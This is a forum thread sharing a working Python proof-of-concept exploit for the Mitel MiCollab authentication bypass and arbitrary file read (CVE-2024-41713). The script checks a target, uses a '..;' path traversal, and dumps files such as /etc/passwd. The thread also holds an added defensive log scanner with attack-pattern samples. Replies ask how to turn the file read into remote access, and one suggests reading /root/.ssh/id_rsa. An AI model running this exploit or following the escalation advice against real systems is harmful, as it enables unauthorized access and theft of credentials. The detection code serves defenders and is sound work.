
Remote CVE-2024-35286 & CVE-2024-41713 Critical Mitel MiCollab Flaw

Focus17 (user, registered 10.10.2019)
Mitel MiCollab Authentication Bypass to Arbitrary File Read

Use:
Bash:
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                           

        watchtowr-vs-MiCollab_2024-12-05.py
        (*) Mitel MiCollab Authentication Bypass and Arbitrary File Read exploit by watchTowr
        
          - Sonny, watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-41713 - Authentication Bypass] - [CVE-2024-00000 - Arbitrary File Read]


            Example Usage:
          - python watchtowr-vs-MiCollab_2024-12-05.py --url http://localhost --file /etc/passwd

Python:
import sys
import argparse
import requests

banner = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                           

        watchtowr-vs-mitel-micollab-cve-2024-41713_2024-12-05.py
        (*) Mitel MiCollab Authentication Bypass and Arbitrary File Read exploit by watchTowr
        
          - Sonny, watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-41713 - Authentication Bypass] - [CVE-2024-00000 - Arbitrary File Read]
"""
helptext = """
            Example Usage:
          - python watchtowr-vs-mitel-micollab-cve-2024-41713_2024-12-05.py --url http://localhost --file /etc/passwd
             """

parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--url", help="target url in the format https://localhost", action="store", required=True)
parser.add_argument("--file", help="file to dump e.g. /etc/passwd", required=True, action="store")
try:
    args = parser.parse_args()
except SystemExit:
    # argparse exits on missing or bad arguments; show the banner and help first
    print(banner)
    print(helptext)
    raise

print(banner)

# Appliances commonly use self-signed certificates; suppress the TLS warnings
requests.urllib3.disable_warnings()

print(f"[*] Target Server: {args.url} ")
print(f"[*] Target File: {args.file} ")

exploit_url = f'{args.url}/npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2'
exploit_headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

exploit_file_str = f'<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../..{args.file}</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>'

exploit_data = {
    "_transaction": exploit_file_str,
    "protocolVersion": "1.0",
    "__iframeTarget__": "x"
}

# Pre-check: confirm the host actually serves the MiCollab end-user portal
pre_check = requests.get(url=f'{args.url}/portal/', verify=False)

if "MiCollab End User Portal" not in pre_check.text:
    print("[*] Server is not Mitel MiCollab, exiting...")
    sys.exit()

# Vulnerability check: an unpatched host serves the protected page through the bypass path
vuln_check = requests.get(url=f'{args.url}/npm-pwg/..;/usp/', verify=False)

if "<title>Search Users</title>" not in vuln_check.text:
    print("[*] Server is Mitel MiCollab, but it's not vulnerable to CVE-2024-41713, exiting...")
    sys.exit()

exploit_request = requests.post(url=exploit_url, verify=False, headers=exploit_headers, data=exploit_data)

print(f"[*] File Dump: {exploit_request.text} ")
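A defender-side counterpart, added here as an example and not part of the forum post or of watchTowr's PoC: a small Python scanner that flags, in web-server access logs, the request shape the PoC above uses. The indicator is a `..;` path segment (a reverse proxy treats it as an ordinary segment, while a Java servlet container strips the `;` path parameter and then normalizes the `..`), especially when it lands on the `/usp/` or ReconcileWizard `IDACall` paths taken from the PoC's URLs. A second helper inspects a SmartClient `_transaction` body for a `<reportName>` that escapes the report directory, the shape of the PoC's file-read request. The log lines are constructed samples, the combined-log format is an assumption, and `SENSITIVE_PATHS` is assembled from the paths visible in the PoC rather than from a vendor list.

```python
"""Access-log and request-body checks for the MiCollab bypass pattern.

Added example (not from the post or from watchTowr's PoC). Assumptions:
combined-log-style access lines, and indicator paths taken from the PoC URLs.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): two benign requests, the
# PoC's two bypass requests, a direct /usp/ hit, and a percent-encoded variant.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Dec/2024:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 5120
10.0.0.5 - - [05/Dec/2024:10:00:02 +0000] "GET /npm-pwg/..;/usp/ HTTP/1.1" 200 2210
10.0.0.5 - - [05/Dec/2024:10:00:03 +0000] "POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1" 200 1890
10.0.0.9 - - [05/Dec/2024:10:01:00 +0000] "GET /npm-pwg/ HTTP/1.1" 200 900
10.0.0.9 - - [05/Dec/2024:10:01:05 +0000] "GET /usp/ HTTP/1.1" 302 0
10.0.0.7 - - [05/Dec/2024:10:02:00 +0000] "GET /npm-pwg/%2e%2e;/usp/ HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A segment that is exactly ".." carrying a ";" path parameter. The proxy
# sees a harmless literal segment; the servlet container drops ";..." and
# then resolves the "..", so "/npm-pwg/..;/usp/" reaches "/usp/".
PATH_PARAM_DOTDOT = re.compile(r'(?:^|/)\.\.;')

# Paths the PoC reaches through the bypass (assumed indicator list built from
# the PoC; reaching them via "..;" is the signal, not the paths on their own).
SENSITIVE_PATHS = ("/usp/", "/reconcilewizard/")

REPORT_NAME = re.compile(r'<reportName>\s*([^<]*)</reportName>', re.I)


def normalize_target(target: str) -> str:
    """Percent-decode once and lower-case so %2e%2e; matches like ..;"""
    return unquote(target).lower()


def classify_request(method: str, target: str) -> list:
    """Return indicator tags for one request; an empty list means no finding."""
    tags = []
    path = normalize_target(target).split("?", 1)[0]
    if PATH_PARAM_DOTDOT.search(path):
        tags.append("path-param-traversal")
        if any(p in path for p in SENSITIVE_PATHS):
            tags.append("auth-bypass-target")
        if method == "POST" and "/idacall" in path:
            tags.append("idacall-via-bypass")
    return tags


def parse_line(line: str):
    """Split one access-log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str) -> list:
    """One finding (ip, timestamp, status, tags) per suspicious line."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        tags = classify_request(rec["method"], rec["target"])
        if tags:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "status": int(rec["status"]), "tags": tags})
    return findings


def report_name_traverses(transaction_xml: str) -> bool:
    """True if any <reportName> in a _transaction body leaves the report
    directory: a ".." segment, an absolute path, or a backslash."""
    for name in REPORT_NAME.findall(transaction_xml):
        value = unquote(name).strip()
        if value.startswith("/") or "\\" in value:
            return True
        if any(seg == ".." for seg in value.split("/")):
            return True
    return False


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {','.join(f['tags'])}")
```

In practice the access-log check is the one most sites can run, since request bodies are rarely logged; `report_name_traverses` is for a WAF or reverse-proxy hook that does see the POST body. A `200` on a `..;` request to `/usp/` is the strongest signal here, because a patched front end should not let that path through at all.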
 
Thanks a lot.
How can I use this CVE?
What I mean is "how can I use this CVE for RCE". I know that the CVE can be run with this command: python watchtowr-vs-MiCollab_2024-12-05.py --url http://localhost --file /etc/passwd
I would be grateful if someone could explain the general process of using CVEs. For example, here it only gives us the file /etc/passwd. Can we convert this into access or not?
 
For remote access, try dumping the SSH keys, which can be found in the file /root/.ssh/id_rsa
 
No, the read there happens with the privileges of the user that runs the web front end, as far as I know,
and those privileges won't be enough to read /root/.ssh/id_rsa
 

